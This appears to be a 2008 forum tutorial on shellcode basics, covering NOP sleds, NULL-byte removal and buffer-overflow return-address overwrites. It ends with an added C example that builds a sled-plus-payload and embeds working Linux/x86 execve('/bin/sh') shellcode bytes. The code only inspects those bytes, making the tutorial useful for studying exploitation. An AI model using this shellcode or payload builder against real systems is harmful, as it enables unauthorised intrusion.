Buffer Overflows and Shellcoding: The True Way To Root a Box  ~  Shellcode 101: A Basic Intro

aatk8626
Posted: Fri Jun 06, 2008 2:12 pm
Shellcode gets its name from the traditional sense of the term: when it was first used, its intended purpose was to spawn a remote shell on the victim's (UNIX) machine. Modern shellcode is no longer limited to Unix environments, nor does it always spawn a remote shell. Today there are several variations of shellcode, including but not limited to payloads that download and execute a file, execute a single command, spawn a process, or spawn a shell.

Shellcode typically takes shape with several distinct sections:

The NOP sled is a fundamental part of the payload. It is a run of \x90 bytes, the hexadecimal representation of the x86 machine code for "no operation". Because a NOP does nothing, execution can land anywhere inside the sled and still reach the code that follows it, which relaxes how precisely the attacker needs to know the buffer's address.

The actual commands to execute (the true shellcode) are assembler instructions encoded as raw bytes, with all NULL (0x00) bytes removed. This is because C/C++ string functions like strcpy stop copying when they come across a NULL byte, so anything after the first NULL never reaches the target buffer and the payload is truncated. The NULL-free requirement only applies when the payload passes through such a string function; other delivery paths may forbid other bytes instead (a newline in a line-based protocol, for example).

Where does the shellcode come from? Simply put, the designer writes a small program in a low-level language such as C/C++/asm and compiles it. Once it is compiled, he disassembles the program to extract the raw machine code. The instructions are organized, checked for NULL bytes (instructions that produce them are rewritten into equivalent NULL-free forms), and then added to the payload so that they execute after the NOP sled.

When the exploit is launched, the buffer overflows and the program's saved return address is overwritten with a pointer into the payload. Execution lands somewhere in the NOP sled and slides through the no-op instructions until it reaches the beginning of the shellcode. If everything goes as planned, the vulnerable process executes the ASM instructions and the exploit succeeds!
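The layout described above (NOP sled, then NULL-free shellcode, delivered through a string function) as an added example that is not part of the original post. It builds a sled-plus-shellcode payload as bytes, checks it for NULL bytes, simulates how much of it strcpy would actually copy, and simulates the "slide" from an arbitrary landing point. The two byte sequences are sample data: NAIVE_SC is a constructed encoding of x86 "mov eax, 0xb ; int 0x80" that carries NULL bytes, and GOOD_SC is the well-known NULL-free Linux/x86 execve("/bin/sh") sequence. Nothing here is executed as code; the bytes are only inspected.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define NOP 0x90  /* x86 single-byte "no operation" */

/* Constructed sample: x86 "mov eax, 0xb ; int 0x80" as a naive assembler
 * would encode it. The 32-bit immediate carries three NUL bytes. */
static const unsigned char NAIVE_SC[] = { 0xb8, 0x0b, 0x00, 0x00, 0x00, 0xcd, 0x80 };

/* The well-known NUL-free Linux/x86 execve("/bin/sh") sequence, used here
 * only as byte data for the checks below; it is never executed. Note the
 * "xor eax,eax ; mov al,0xb" (31 c0 ... b0 0b) that replaces "mov eax,0xb". */
static const unsigned char GOOD_SC[] = {
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69,
    0x6e, 0x89, 0xe3, 0x50, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80
};

/* Index of the first NUL byte in buf[0..len), or -1 if there is none. */
long find_null(const unsigned char *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0) return (long)i;
    return -1;
}

/* Lay out sled_len NOPs followed by the shellcode.
 * Returns the total number of bytes written, or 0 if out is too small. */
size_t build_payload(unsigned char *out, size_t cap, size_t sled_len,
                     const unsigned char *sc, size_t sc_len) {
    if (sled_len + sc_len > cap) return 0;
    memset(out, NOP, sled_len);
    memcpy(out + sled_len, sc, sc_len);
    return sled_len + sc_len;
}

/* How many bytes strcpy() would copy from the payload: it stops at the
 * first NUL, so everything after that byte is silently dropped. */
size_t strcpy_copied_len(const unsigned char *payload, size_t len) {
    long n = find_null(payload, len);
    return n < 0 ? len : (size_t)n;
}

/* Simulate the sled: starting at offset entry, skip NOPs and return the
 * offset of the first real instruction (len if execution ran off the end). */
size_t slide(const unsigned char *payload, size_t len, size_t entry) {
    size_t pc = entry;
    while (pc < len && payload[pc] == NOP) pc++;
    return pc;
}

int main(void) {
    unsigned char buf[128];
    size_t n;

    printf("naive shellcode: first NUL at index %ld\n",
           find_null(NAIVE_SC, sizeof NAIVE_SC));
    printf("good shellcode:  first NUL at index %ld\n",
           find_null(GOOD_SC, sizeof GOOD_SC));

    n = build_payload(buf, sizeof buf, 32, NAIVE_SC, sizeof NAIVE_SC);
    printf("naive payload: %zu bytes built, strcpy would copy %zu\n",
           n, strcpy_copied_len(buf, n));

    n = build_payload(buf, sizeof buf, 32, GOOD_SC, sizeof GOOD_SC);
    printf("good payload:  %zu bytes built, strcpy would copy %zu\n",
           n, strcpy_copied_len(buf, n));
    printf("landing at offset 17 slides to offset %zu (shellcode starts at 32)\n",
           slide(buf, n, 17));
    return 0;
}
```

The sled size (32 here) is a tuning knob: a longer sled tolerates a less accurate guess of the buffer address but needs more room in the overflowed buffer. The strcpy simulation is the check worth running before any real attempt: if the copied length is shorter than the payload, some instruction still encodes a NULL and must be rewritten.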